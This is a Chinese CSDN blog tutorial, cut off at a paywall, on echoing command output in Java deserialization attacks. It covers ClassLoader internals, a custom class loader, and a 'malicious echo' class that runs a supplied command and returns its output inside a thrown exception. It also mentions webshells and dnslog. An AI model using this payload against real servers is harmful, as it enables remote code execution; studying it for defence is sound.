怎样简单使用java序列回显学习

最新推荐文章于 2024-08-02 02:20:50 发布
最新推荐文章于 2024-08-02 02:20:50 发布
阅读量580 收藏 1
点赞数
分类专栏: 程序员 编程 Java 文章标签: java 开发语言 数据结构 spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Trouvailless/article/details/124319788
版权
本文详细介绍了Java反序列化回显的各种方法,包括defineClass、RMI绑定实例、URLClassLoader异常回显等。通过自定义ClassLoader、改造cc链和绑定RMI实例等手段,演示了如何利用Java类加载机制实现回显。文章还提到了常见的中间件回显、写文件和DNS日志等其他回显方式。
摘要由CSDN通过智能技术生成

java反序列化回显

在很多不出网的情况下,一种是写webshell(内存嘛),另一种就是回显,本文先学习回显,回显的主要方式有一下几种。

  1. defineClass
  2. RMI绑定实例
  3. URLClassLoader抛出异常
  4. 中间件
  5. 写文件css、js
  6. dnslog

前面有多多少了解过ClassLoader本篇花费一节仔细学习一下

1、前置知识

classloader顾名思义,即是类加载。虚拟机把描述类的数据从class字节码文件加载到内存,并对数据进行检验、转换解析和初始化,最终形成可以被虚拟机直接使用的Java类型,这就是虚拟机的类加载机

1.1、ClassLoader加载过程

主要是三个阶段

第一个阶段是加载,把.class文件加载到内存,并为它创建一个java.lang.Class对象

第二个阶段是连接,连接包括三阶段

验证:确保加载的类信息符合JVM规范,无安全方面的问题。

准备:为类的静态Field分配内存,并设置初始值,变量的初始值,如:int=0。

解析:将类的二进制数据中的符号引用替换成直接引用。

第三阶段是初始化

1、优先对该类的父类进行初始化,然后对static修饰的变量和代码块进行初始化

1.2、classloader双亲委托机制

当一个类加载的过程中,它首先不会去加载,而是委托给自己的父类去加载,父类又委托给自己的父类。因此所有的类加载都会委托给顶层的父类,即Bootstrap Classloader进行加载,然后父类自己无法完成这个加载请求,子加载器才会尝试自己去加载

1.启动类加载器(Bootstrap Classloader)负责将<JAVA_HOME>/lib目录下并且被虚拟机识别的类库加载到虚拟机内存中。我们常用基础库,例如java.util. ,java.io. ,java.lang.**等等都是由根加载器加载

2.扩展类加载器(Extention Classloader)负责加载JVM扩展类,比如swing系列、内置的js引擎、xml解析器等,这些类库以javax开头,它们的jar包位于<JAVA_HOME>/lib/ext目录中

3.应用程序加载器(Application Classloader)也叫系统类加载器,它负责加载用户路径(ClassPath)上所指定的类库。我们自己编写的代码以及使用的第三方的jar包都是由它来加载的

4.自定义加载器(Custom Classloader)通常是我们为了某些特殊目的实现的自定义加载器

1.3、ClassLoader类 核心方法

1.loadClass(String className),根据名字加载一个类。
2.defineClass(String name, byte[] b, int off, int len),将一个字节流定义为一个类。
3.findClass(String name),查找一个类。
4.findLoadedClass(String name),在已加载的类中,查找一个类。

1.4、自定义Classloader

当加载一个类时,会首先从已经加载的类里面去查找这个类。如果类未加载,且如果父加载器不为空,则调用父加载器的loadClass方法进行加载,如果父加载器为空,则调用BootStrap class loader加载。如果依然没有加载到类,则调用findClass方法。而findClass方法是需要子类重写的。所以我们只需要继承classLoader重写findClass方法就可以实现自定义ClassLoader

1、继承classLoader
2、重写findClass()方法
3、在findClass()中调用defineClass

编写测试类

package com.akkacloud.demo;

import java.io.*;
import java.util.Arrays;

public class test {
    public void testclassloder() {
        System.out.println("test classloader");
    }


}

编译成class文件

编写自己的classLoder

package com.akkacloud.demo;

import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class myClassloader extends ClassLoader{

    private static String ClassName = "com.akkacloud.demo.test";
    //获取class文件,转换成byte
    private static byte[] getbyte() throws IOException {
        InputStream is = new FileInputStream(new File("/Users/akka/Downloads/deserialzeEcho/src/main/java/com/akkacloud/demo/test.class"));
        ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
        byte[] bytes = new byte[1024];
        int temp;
        while ((temp = is.read(bytes)) != -1) {
            outputStream.write(bytes, 0, temp);
        }
        //转换后的byte[]
        byte[] finalBytes = outputStream.toByteArray();
        return finalBytes;

    }

    @Override
    protected Class<?> findClass(String name) throws ClassNotFoundException {

        //如果类名为我们定的类
        if(name==ClassName){
            try {
                //从字节中获取一个类
                return defineClass(ClassName, getbyte(),0,getbyte().length);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
        return super.findClass(name);
    }

    public static void main(String[] args) throws ClassNotFoundException {
       //新建自定义的类加载器
        myClassloader myClassloader = new myClassloader();
        Class<?> aClass = myClassloader.loadClass(ClassName);
        try {
            //反射调用类的方法
            Object o = aClass.newInstance();
            Method declaredMethod = aClass.getMethod("testclassloder", null);
            declaredMethod.invoke(o, null);
        } catch (InstantiationException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        } catch (NoSuchMethodException e) {
            e.printStackTrace();
        } catch (InvocationTargetException e) {
            e.printStackTrace();
        }


    }
}

2、defineClass异常回显

首先新建恶意异常回显类,并且编译成class文件

package com.akkacloud.demo;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Echo {
    public Echo(String cmd) throws Exception {
        ProcessBuilder processBuilder = new ProcessBuilder(new String[]{cmd});
        Process start = processBuilder.start();
        InputStream inputStream = start.getInputStream();
        InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
        BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
        StringBuffer stringBuffer = new StringBuffer();

        String line =null;
        while ((line = bufferedReader.readLine()) != null) {
            stringBuffer.append(line).append("\n");
        }
        throw new Exception(stringBuffer.toString());

    }
}

新建自己的classLoder

package com.akkacloud.demo;

import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class myClassloader extends ClassLoader{

    private static String ClassName = "com.akkacloud.demo.Echo";
    //获取class文件,转换成byte
    private static byte[] getbyte() throws IOException {
        InputStream is = new FileInput
最低0.47元/天 解锁文章
ikt4435
关注
专栏目录
Java实现简单的server/client回显功能
01-20
Socket是指在一个特定编程模型下,进程间通信链路的端点。因为这个特定编程模型的流行,Socket这个名字在其他领域得到了复用,包括Java叫技术。   如果要建立连接,一台机器必须运行一个进程来等待连接,而另一台机器必须试图到达第一台机器。这个电话系统类似:一方必须发起呼叫,而另一方在此时必须等待电话呼叫。 java网络模型图   下面通过一个有“回显”功能的服务器和客户端来介绍应用java.net包编写网络应用程序。   这个例子主要功能是服务器端的程序等待客户的输入,然后将读取到的信息回显给客户端,同时在服务器端的控制台输出。而客户端从控制台接收信息后,向客户端发
Java序列回显学习
weixin_47367099的博客
04-21 575
java序列回显 在很多不出网的情况下,一种是写webshell(内存嘛),另一种就是回显,本文先学习回显回显的主要方式有一下几种。 defineClass RMI绑定实例 URLClassLoader抛出异常 中间件 写文件css、js dnslog 前面有多多少了解过ClassLoader本篇花费一节仔细学习一下 1、前置知识 classloader顾名思义,即是类加载。虚拟机把描述类的数据从class字节码文件加载到内存,并对数据进行检验、转换解析和初始化,最终形成可以被虚拟机
Java 回显
最新发布
weixin_30480281的博客
08-02 34
理解和实现 Java 回显 引言 Java 回显是一种基本的编程技术,常用于收集用户输入,并将该输入返回给用户。通过实现回显功能,开发者可以有效地与用户进行交互,增强程序的用户体验。本文将详细介绍如何实现 Java 回显,帮助初学者掌握这个基本的编程技巧。 实现步骤 在实现 Java 回显的过程中,我们需要遵循以下几个步骤...
Java实现文件回显
永远热血的少年
04-26 1001
在项目中对已经保存的文件进行回显是经常需要做的,常用的是在后端将文件转为base64编码再传给前端,前端在展示文件的容器(比如最简单的img标签)的url里赋值传过来的base64码就可以回显文件。
java回显怎么实现_Springmvc数据回显实现原理实例解析
weixin_35964787的博客
02-25 2567
数据回显就是当用户数据提交失败时,自动填充好已经输入的数据,一般来说,如果是使用Ajax来做数据提交,基本上是没有数据回显这个需求的,但是如果通过表单做数据提交,那么数据回显就非常必要了。简单数据类型数据回显简单数据类型,实际上框架在这里没有提供任何形式的支持,就是我们自己手动配置。加入提交的 Student 数据不符合要求,那么重新回到添加 Student 页面,并且预设之前已经填好的数据。首先...
【来点小剧场--爪哇岛寻宝】java实现网络编程,UDP协议写一个简易的回显服务程序
m0_62815572的博客
05-09 213
这是一篇关于网络编程的文章,在这篇文章中我会剖析一段回显服务程序的执行步骤和代码编程,希望对你有所帮助!
java序列回显学习.doc
07-08
Java序列回显和反序列化是Java编程中涉及安全性和数据传输的重要概念。序列化是将对象的状态信息转换为可以存储或传输的形式的过程,而反序列化则是将这种形式还原为原来的对象状态。在一些不出网的场景下,利用...
Java序列回显解决方案.docx
12-19
Java序列回显解决方案是指在Java中,使用序列化来执行命令,导致RCE(Remote Code Execution)的解决方案。该解决方案主要涉及到Java的反序列化机制和ClassLoader的使用。 首先,Java的反序列化机制允许攻击...
067-JAVA序列化基于常见框架_中间件回显方案.pdf
09-20
JAVA序列化漏洞是Java应用程序中常见的安全问题,它允许攻击者通过操纵序列化和反序列化过程来执行任意代码,从而获取目标系统的权限。在本文中,我们将深入探讨基于常见框架和中间件的反序列回显方案,以及如何...
linux下java序列化通杀回显方法的低配版实现 - 先知社区1
08-03
这个话题源于解决Java序列化利用过程中的两大痛点:可用的gadget(Java代码片段)和带内回显问题。通常,Java序列化漏洞可能导致远程代码执行,但如果没有合适的gadget或无法实现回显,攻击者很难验证漏洞是否...
Java+Swing: 数据回显和修改功能的实现 整理14
xiaoxie_life_study
12-18 466
Java+Swing: 数据回显和修改功能的实现 整理14
表单数据回显
TwcatL_tree
06-25 3440
一. 概念:   在数据提交出现错误的时候, 已填写的信息仍在文本框中, 比如用户登录, 当用户输入错误的密码之后, 用户名仍在文本框, 只是密码框清空 二. 意义:   对于一些要填写很多信息的表单, 如果因为一些错误导致已经填写的整个表单信息重新填写, 对于用户非常地不友好 三. 回显方法:   1. 默认情况 POJO数据传入controller方法后, springMvc自动将POJO数据放到request域, key等于POJO类的首字母小写   ** 实验:   (1) 在商品名称...
基于Java实现回显示服务器
2301_77603222的博客
01-23 450
回显服务器是返回与客户端相同请求数据的一种服务器实现模式,服务器通过解析客户端发送的数据包,构造和返回与请求数据包内容一致的数据包。
JavaWeb数据回显 下拉列表、单选框、多选框 选中状态
m0_48660016的博客
11-13 7665
当你提交一个表单失败 或 修改信息时,表单中的下拉列表、单选框、多选框 应该默认选中提交之前 或修改之前的状态 的状态 1. 下拉列表 jstl <select name="classes"> <option value="">请选择</option> <c:forEach items="${classList}" var="itemm"> <option value="${itemm.id}"<c:if test...
单选框,下拉框,复选框 的回显
NMYZC的博客
03-06 2176
在列表显示的界面中通常都有编辑操作,进行编辑操作时通常就牵涉到数据的回显问题,本文中编辑界面和添加界面是在同一个界面。 页面中使用了jstl中的c标签,所以要先引用: <%@ taglib prefix=“c” uri=“http://java.sun.com/jsp/jstl/core”%> 1、单选按钮的数据回显: 性别: 男 ...
java回显怎么实现_Java实现简单的server/client回显功能
weixin_30633869的博客
02-25 1005
Java实现简单的server/client回显功能 Socket是指在一个特定编程模型下,进程间通信链路的端点。因为这个特定编程模型的流行,Socket这个名字在其他领域得到了复用,包括Java叫技术。 如果要建立连接,一台机器必须运行一个进程来等待连接,而另一台机器必须Java实现简单的server/client回显功能Socket是指在一个特定编程模型下,进程间通信链路的端点。因为这个特定编...
浅谈Java中DefineClass方法以及ClassLoader
weixin_38526093的博客
04-04 4848
一、反射调用ClassLoader类的defineClass方法直接根据字节数组定义一个类 package org.hope; import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Method; import java.net.URL; import java.net.URLClassLoader; public class Main2{ public static void main(St
Java低代码:jvs-list (子列表)表单回显及触发逻辑引擎配置说明
09-13 667
子列表新增表单可使用表单回显配置,在新增表单中默认回显,如图效果1、子列表中进入新增页面配置2、切换到表单设置,选择回显设置,进入回显逻辑引擎。3、在画布中拖入【对象变量】节点,使用对象节点在打开页面时回显字段数据。参数名使用表单关联字段字段名,使用公式获取点击的主列表的行数据id。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值